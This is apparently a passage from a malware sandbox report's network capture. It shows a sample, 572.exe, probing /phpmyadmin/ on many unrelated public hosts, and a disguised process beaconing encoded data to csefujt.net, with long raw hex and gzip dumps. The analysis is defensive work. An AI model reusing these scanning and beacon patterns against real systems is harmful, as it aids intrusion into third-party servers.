                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                294192.168.2.65710354.183.63.24180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.562803984 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.780786037 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: aw0ZU7Wx77VPHv6
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 34 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 74 b2 93 38 d9 38 c9 f4 20 1b 18 45 b2 28 d1 21 59 0c ab 68 4b ed c9 c7 0c f6 61 30 0b ec d3 60 5f f6 d5 3f b6 e7 14 49 89 94 a8 c4 e9 56 37 d6 84 ac 72 5d ce fd 56 c5 f2 d1 37 67 2f 4e 5f ff f5 e5 39 99 c9 c0 1f 1f 7d a3 eb ef 3c 97 3c 3d 27 83 f7 63 92 ff 1c e1 20 71 bc f8 58 f3 65 ac 11 9f 86 d3 63 8d 85 fa 9b 4b 8d d8 3e 15 e2 58 f3 d8 40 1b 93 a3 6f de b1 d0 f1 dc f7 ba 5e 04 36 fc 6a 60 c3 2d c0 a6 32 83 87 1d e3 6a 58 91 d4 ad 58 ad d7 f5 22 8c bd a3 19 a3 ce 78 4f 51 11 30 49 81 69 19 e9 ec 63 e2 dd 1c 6b 3f e9 6f 26 fa 29 0f 22 2a 3d cb 67 40 0b 0f 25 0b e5 b1 f6 f4 fc 98 39 53 e8 31 b6 ad 3d 4d a7 ea af 17 51 71 a1 64 73 69 20 89 87 c4 9e d1 58 30 79 fc e6 f5 63 7d b0 06 29 a4 01 3b d6 68 14 f9 4c f7 64 12 32 a1 c3 1f 05 38 f0 97 ee 39 c7 c3 f6 f0 a0 b7 3f e8 f5 9a 04 7b 68 3c 4d 02 1c 47 4a c4 c8 30 22 d9 12 cc 4e 62 d6 f2 82 9b a4 65 f3 c0 08 91 82 3f 09 9e c4 36 3b b6 68 18 b2 58 21 2f 22 9e 72 3e 05 cc 91 4f 17 d5 78 01 50 0a 31 e0 96 e7 33 9b c7 0e bf a1 1b 70 52 06 d2 39 fa 2d b3 10 98 6e d3 88 96 a5 b9 60 e2 61 4b 85 a4 32 11 ba 45 63 68 2e 4a 30 2c 9f da 1f 74 19 d3 50 f8 89 0d 5d ff 0f 89 f1 bd f0 03 89 99 9f 03 94 3c b1 67 ba 07 cb 34 22 bc 9f 19 98 f9 fe c1 7c ff 40 23 b3 98 b9 c7 1a 6a 11 94 b8 ae 41 f8 04 3c 34 6e 3d 39 0b 98 e1 05 53 c3 a5 37 08 c5 58 07 ab 2b 70 ad 28 9c 3e 98 80 be 39 ef 9b bb 23 40 81 fb 2a 02 0e 3a f3 83 ce ee 08 50 e0 be 8e 80 fe fc a0 bf 43 02 10 dc 57 11 d0 6e f7 e6 f0 d9 1d 09 19 c0 af 23 a2 63 ce e1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1241;nH#$t88 E(!YhKa0`_?IV7r]V7g/N_9}<<='c qXecK>X@o^6j`-2jXX"xOQ0Iick?o&)"*=g@%9S1=MQqdsi X0yc});hLd289?{h<MGJ0"Nbe?6;hX!/"r>OxP13pR9-n`aK2Ech.J0,tP]<g4"|@#jA<4n=9S7X+p(>9#@*:PCWn#c
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.780853033 CET1286INData Raw: b3 43 22 52 80 5f 47 44 0f 08 ef ed 52 12 29 c0 af 23 62 bf 33 87 cf 0e 89 48 01 7e 1d 11 03 90 de 60 97 ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 88 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0 fb b0 57 42 9f f5 fd 3e 04 0c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: C"R_GDR)#b3H~`HV")3_9y79I>CWB>a^ist{5!Iy,<2!1@Z ebci'<:Z+EJW-x$N;t{p3WF\xZd=2%F-(X[\JL![Q
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.780865908 CET1286INData Raw: a8 7d 70 dd a6 0b bb e1 7a 06 a0 d1 94 bc fe a8 3b 9c 0c 4f 4e 1a 5f b5 1d 49 d7 37 f3 b5 eb e1 7f 5b 25 fa 40 a7 da 1e b0 ab a6 6d 04 6e e0 f6 81 b0 95 3a 1e 86 20 d5 5c d1 35 3b 93 d3 83 f3 76 19 d3 2d 6c b5 f8 ad 58 15 61 6b f6 f3 a9 b0 47 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }pz;ON_I7[%@mn: \5;v-lXakGfqd{gCzqc3{%(\pI#F2"O}sd/{$vYCu/>L:6]fc[a%8Z/l]m+tOV}#DD]@Aw
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.780878067 CET1286INData Raw: c7 1a 9f 8e 60 57 4b fd f2 f4 ab e5 74 23 bd 85 76 84 1c e5 17 de 60 23 70 eb a4 d7 b4 88 da 5f 41 1d 36 d5 23 a9 c1 3c c7 bb c9 a7 c5 6c aa af b6 64 b0 4f c0 1a ed 58 d3 b2 db 64 6b 33 d3 bd 36 73 b4 c2 de 09 a7 78 0e d4 53 40 03 8b b5 b2 18 8e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: `WKt#v`#p_A6#<ldOXdk36sxS@/B^I/@:km\2Aoa1Y=hw^F6^tmCz: T P6pb8fWQB"1NN".C`S<KyXbD
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.780889988 CET295INData Raw: 4d 36 ea 0e a7 2d d1 e2 55 83 e9 e1 ae ad 4e 61 34 30 ed 5c 3d c7 17 26 7f f6 e4 55 c7 c4 7f f3 70 5c 6d 3c 09 13 28 20 76 1c d3 af b9 85 91 ea 1c 9d 78 ba 9b 98 5b f2 a3 42 81 27 a8 cb e4 02 36 c7 91 30 db 69 89 77 c9 a6 09 ec 60 20 c1 ef 58 90
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M6-UNa40\=&Up\m<( vx[B'60iw` X7Tjl\']B!-{=lbL|1/X|M[Vyn}~^M>X2n[A~ZXU/LX/?OZ=`A$ixv5eb'doqA^b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                295192.168.2.65702564.190.63.13680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.562805891 CET227OUTGET /phpmyadmin/?sub1=20240205-2214-52da-a2cf-fa6f6140149e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.773737907 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                296192.168.2.657089185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.639409065 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.876172066 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                297192.168.2.657084124.237.208.3780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.750916004 CET174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.147237062 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.147250891 CET1280INData Raw: b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: [Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@IwxzZ}e
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.147262096 CET324INData Raw: 27 27 d1 a0 53 0f 82 9e cf 87 a7 8e 0c ec 49 e1 1a fb 01 24 c7 95 eb cb 7b ed c7 86 98 a3 0b a2 ca 42 8a 29 83 13 95 98 e1 70 1a 36 f6 21 70 7f 53 27 0a c4 36 66 04 b5 80 13 0f 72 7a 91 30 ac ac 7a 4e 53 54 9c c5 ce e4 a6 bc 14 6d 40 a8 c0 46 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T:d2v
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.147273064 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.151076078 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.364430904 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                298192.168.2.657231142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.800642014 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.923288107 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.923327923 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f cd 0a 83 30 10 84 ef 3e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 f9 41 63 c1 b7 6f 4c 7b ec 5c 96 9d 1d 86 6f 71 cd da 86 24 b8 a6 79 19 06 7b b0 86 92 d6 be e5 00 98 d4 ce 2e 7c 99 e6 1d a3 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0>EHkA$b0AcoL{\oq$y{.|!,k>*F,(x^7aJMK+1sPWv3~MGkYj;d$J.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                299192.168.2.657406201.134.41.6180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.811563015 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.973809004 CET572INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
